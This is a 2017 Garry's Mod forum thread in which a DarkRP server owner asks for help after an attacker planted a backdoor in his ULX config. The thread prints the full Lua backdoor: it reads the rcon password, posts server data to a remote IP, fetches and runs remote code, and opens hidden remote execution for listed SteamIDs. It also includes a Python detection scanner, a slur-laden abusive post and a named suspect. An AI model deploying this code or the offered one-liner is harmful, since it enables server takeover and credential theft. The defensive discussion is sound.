*BEWARE* Huge Exploit, Nobody's talking about this?

I started a new server recently, and a player joined. As soon as he had loaded in, he was able to strip everyone's weapons and remove all entities on the map (printers, etc). He told me he had found an exploit. I made sure to disable clientside scripts in darkrpmodification, and added in cake anticheat. After rebooting, I told the user to rejoin and try again. He got kicked once, and then rejoined, and bypassed the anticheat.

I know there’s the big citizenhack, odiumpro, and other things out there that are able to do this. The user mentioned that the way he was exploiting was by the use of net messages. He told me he’d created his own bypass system, and then offered to help me.

He told me that running this line would close net messages to stop people from exploiting properties. I just wanted to see what people thought of this, since I don’t know if it is legitimate.
"util.AddNetworkString('ULX_QUERY2') net.Receive('ULX_QUERY2',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)"

Furthermore, if anticheat is so easy to bypass, why am I having difficulty finding a post that mentions this and also has a solution to it? I’m running darkrp with extremely minimal addons. Any scripts I have are from gmodstore as well.

You’ve got an addon or script somewhere that isn’t properly making sure that people running commands are supposed to be running those commands.

Also, that snippet he gave you is bad. Lets him run any Lua he inputs, serverside.

95% a workshop addon you have running.

Also, do not run anything he gives you.

Is it true that using that command and then restarting the server would wipe that command?

[editline]15th July 2017[/editline]

Furthermore, here is a list of my workshop addons.

[editline]15th July 2017[/editline]

Also, I’m using:
-blogs
-adminpopups
-ahud
-arivia f4
-ascoreboard
-awarn2
-bitminer
-cuffs
-meth
-wyozi cinema kit
-money clickers

[editline]15th July 2017[/editline]

Also, he is able to do this on a darkrp server that has NO addons aside from darkrp and I would imagine ULX.

Even if there were some exploit beyond a backdoor created from an addon, we wouldn’t know unless you provided explicit details. Just saying that someone exploited your server doesn’t help. I’d venture to guess he wouldn’t be able to do this on a purely vanilla DarkRP server.

I just got a message saying to check my ulx config.

He planted a httpfetch hook that gave him access to a bunch of things. I removed the hook, changed rcon password.

I’m being told that my server is done and that there is no way to remove it. Is that entirely true? Also, how did he manage to do this to my server?

[editline]15th July 2017[/editline]

-- server info gathering
if easylua then return end
local pwn = {}
pwn['G'] = table.Copy(_G)
pwn['R'] = debug.getregistry()
pwn['address_full'] = "http://159.203.163.139/index.php"
pwn['address'] = pwn['address_full']
pwn['sstr'] = "ULX_QUERY2"
pwn['cstr'] = "ULX_QUERY"
pwn['sid'] = {
["STEAM_0:0:46709807"] = true,
["STEAM_0:0:70614886"] = true,
["STEAM_0:1:118234279"] = true,
}
pwn['fsender_interval'] = 130
pwn['inj_interface_interval'] = 600
pwn['G']["util"]"AddNetworkString"
pwn['G']["util"]"AddNetworkString"

pwn['G']["pcall"](
function()

pwn['p'] = function(y)
  for k,v in pairs(player.GetAll()) do
    if pwn['sid'][v:SteamID()] then
      v:oldsendlua([=[ chat.AddText( Color( 255, 93,155, 255 ),[[]=]..y..[=[]]) ]=])
    end
  end
end

pwn['rstr'] = function ( intMin, intMax )
  local ret = ""
  for _ = 1, pwn['math']["random"]( intMin, intMax ) do
    ret = ret.. string.char( math.random(65, 90) )
  end

  return ret
end

pwn['sli_inj'] = function( pPlayer, strLua )
pwn['net']["Start"]( "rlua" )
pwn['net']["WriteString"]( strLua )
pwn['net']["Send"]( pPlayer )

end

pwn['sli_interface'] = function (pPlayer )
pPlayer:oldsendlua( [[net.Receive("ULX_QUERY", function() RunStringEx(net.ReadString(),"lua/addons/gGenerate/workshop.lua",false) end)]] )
end

pwn['runlua'] = function(r, t)
local y = pwn['G']"CompileString"
if type(y) ~= 'function' then
pwn['p']('SYNTAX ERROR:'..y)
else
local u, i = pwn['G']"pcall"
if not u then
pwn'p'
end

end

end
pwn['chk_scan'] = function()
for k,v in pairs( string.Split( pwn['file']"Read", "\n" ) ) do
if( string.StartWith( v, "rcon_password" ) ) then
local str = v
str = string.Replace( str, "\"", "" )
str = string.Right( str, #str - 14)
pwn["rcon_config"] = str
end
end
if CAC then
pwn['anticheat'] = "CAC"
elseif SimplicityAC then
pwn['anticheat'] = "SimplicityAC"
elseif QAC then
pwn['anticheat'] = "QAC"
else
pwn['anticheat'] = "unknown"
end

pwn['inf_tbl'] = {
sn = GetHostName(),
playercount = tostring( #player.GetAll() ),
ip = _G["game"]"GetIPAddress",
gamemode = _G["engine"]"ActiveGamemode",
serverpass = _G"GetConVarString" or "nil",
rcon = pwn['rcon_config'] or "nil",
currentac = pwn['anticheat'] or "nil",
infectedaddon = GPVERSION or "nil"
}

end

pwn['bstrapper'] = function()
pwn'def_registry'
pwn'chk_scan'
pwn'chk_pos'
pwn['G']['timer']['Create'](pwn'rstr',pwn['inj_interface_interval'],0,function()
for k,v in pairs(player.GetAll()) do
pwn['sli_interface'] (v)
end
pwn'reg_interval'
end)

pwn['net']['Receive']("ULX_QUERY2",function(pl,len)
local gstr = pwn["net"]"ReadString"
local gbit = pwn["net"]"ReadBit"
if gbit == 1 then
pwn'runlua'
end
end)
end

pwn['reg_interval'] = function(gq)
pwn['inj_interface_interval'] = gq

end

pwn['def_registry'] = function()
pwn['R']["Player"]["oldsendlua"] = pwn['R']["Player"]["SendLua"]
pwn['R']["Player"]["oldsteamid"] = pwn['R']["Player"]["SteamID"]
pwn['R']["Player"]["oldunique"] = pwn['R']["Player"]["UniqueID"]
pwn['R']["Player"]["oldnick"] = pwn['R']["Player"]["Nick"]
-- globals
pwn['math'] = pwn['G']["math"]
pwn['net'] = pwn['G']["net"]
pwn['http'] = pwn['G']["http"]
pwn['file'] = pwn['G']["file"]
end

pwn['chk_pos'] = function()
if SERVER and pwn['G']["game"]"IsDedicated" then -- report the server to our addr
pwn['http']["Post"](pwn['address'], pwn["inf_tbl"] )
end
end
-- advanced hiding techniques :) , not rly .

pwn['Fetchcode'] = function(url)
pwn['http']["Fetch"](url,function(c) pwn'runlua' end)
end

pwn['chk_panel'] = function (ply,cmd,args)
if pwn["sid"][ply:SteamID()] then
ply:oldsendlua([=[
if file.Exists("lua/bkit.lua","GAME") then
_G"RunStringEx"
MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")
else
MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")
end
]=])
else
ply:oldsendlua([=[MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")]=])
end
end
pwn['G']["concommand"]"Add"

pwn['G']["timer"]["Simple"](pwn['fsender_interval'] ,function()
pwn['bstrapper'] ()

end)
end
)
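As an added, defender-side example (not code from the thread, and not part of ULX, DarkRP or any anticheat named here): a small Python scanner for the indicators visible in the dump above, run over constructed sample Lua files. The rule names, file paths and sample sources are this example's own assumptions.

```python
import re

# Indicator rules drawn from the dump above (constructed for this example, not a
# product ruleset); each is (name, regex) run over the text of one Lua file.
RULES = [
    # net.ReadString() passed straight into a code-execution function
    ("net_to_runstring", re.compile(
        r"\b(?:RunStringEx|RunString|CompileString)\s*\(\s*net\.ReadString\s*\(")),
    # http.Fetch whose callback (within ~300 chars) executes the fetched body
    ("fetch_and_exec", re.compile(
        r"http\.Fetch\s*\(.{0,300}?\b(?:RunStringEx|RunString|CompileString)\s*\(",
        re.S)),
    # a URL pointing at a bare IPv4 address instead of a hostname
    ("raw_ip_url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")),
    # Player metatable fields assigned through the Lua registry
    ("player_meta_via_registry", re.compile(r'\["Player"\]\s*\["\w+"\]\s*=')),
    # Lua that touches the rcon password at all
    ("rcon_password_read", re.compile(r"rcon_password")),
    # snapshotting _G, the prelude to calling globals through hidden aliases
    ("globals_snapshot", re.compile(r"table\.Copy\s*\(\s*_G\s*\)")),
]

def scan_lua(source):
    """Return the sorted rule names that fire on one Lua source string."""
    return sorted(name for name, rx in RULES if rx.search(source))

def scan_tree(files):
    """files maps relative path -> source; only paths with findings are returned."""
    report = {path: scan_lua(src) for path, src in files.items()}
    return {path: hits for path, hits in report.items() if hits}

# Constructed samples: the handler the player offered in the thread, a benign
# net.Receive that bounds and authorises its input, and a benign http.Fetch.
SAMPLES = {
    "ulx/lua/ulx/modules/sh/query.lua":
        'util.AddNetworkString("ULX_QUERY2") '
        'net.Receive("ULX_QUERY2", function(len, pl) '
        'RunStringEx(net.ReadString(), "[C]", false) end)',
    "addons/myhud/lua/autorun/server/sv_title.lua":
        'util.AddNetworkString("SetTitle")\n'
        'net.Receive("SetTitle", function(len, pl)\n'
        '  local t = string.sub(net.ReadString(), 1, 32)\n'
        '  if pl:IsAdmin() then pl:SetNWString("title", t) end\nend)',
    "addons/news/lua/autorun/server/sv_news.lua":
        'http.Fetch("https://example.invalid/news.json", function(body)\n'
        '  NEWS = util.JSONToTable(body) or {}\nend)',
}
```

On a real server you would feed scan_tree every .lua file under garrysmod/lua and garrysmod/addons (the ULX config included) and review each hit by hand; a match is a lead, not proof, and a clean scan does not rule out a backdoor written differently.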

From an exploit in one of your addons or FTP.

Given the huge thing I just posted, even though I removed it, is my server even safe anymore?

[editline]15th July 2017[/editline]

Is this literal malware? Do I need to completely wipe my server?

[editline]15th July 2017[/editline]

I would really appreciate knowing whether or not my server is at all safe?

I’ve changed my authkey, changed my rcon password

Can you fill us in where you got that copy of ulx from?
You should probably check the source to make sure someone else didn’t upload that file to your server.

The person managed to plant that in the server.

Now that it is removed, is my server safe?

[editline]15th July 2017[/editline]

Will someone please respond with a yes/no?

-snip-

Soo you’re saying someone remotely updated your ulx config file?

Yes, he was able to bypass my cake anticheat and somehow managed to upload that.

Now, back to my question, looking at the malicious code that was injected, is there anything I need to be worried about, now that all my passwords are changed?

YOU BEING A FUCKING RETARD ISN’T A HUGE EXPLOIT LOL

I’ve done nothing to receive that title.

Can someone useful reply though?

You asking us if your server is safe is not a very good question; how are we supposed to know? The only thing you can do is check all of your addons for backdoors, etc.

Assuming that’s the only exploit your server will be fine once it’s removed.
However, I'd be more concerned about how he/she managed to upload the file. If the person exploiting your server has access to upload files, what's to stop them uploading another file?

I WILL REPLY TO YOU WHEN YOU’RE NOT A FUCKING RETARD LOL

[editline]16th July 2017[/editline]

HAHAHAHA DUMB NIGGER


(User was permabanned for this post ("Spammer" - Kiwi))

It was inside of the ULX config. I got the standard ULX. It was clearly done by this player: http://steamcommunity.com/id/Childlike/

He is an experienced hacker as well. Just look at his profile.

[editline]15th July 2017[/editline]

It appears this guy is one of the creators of odium.pro.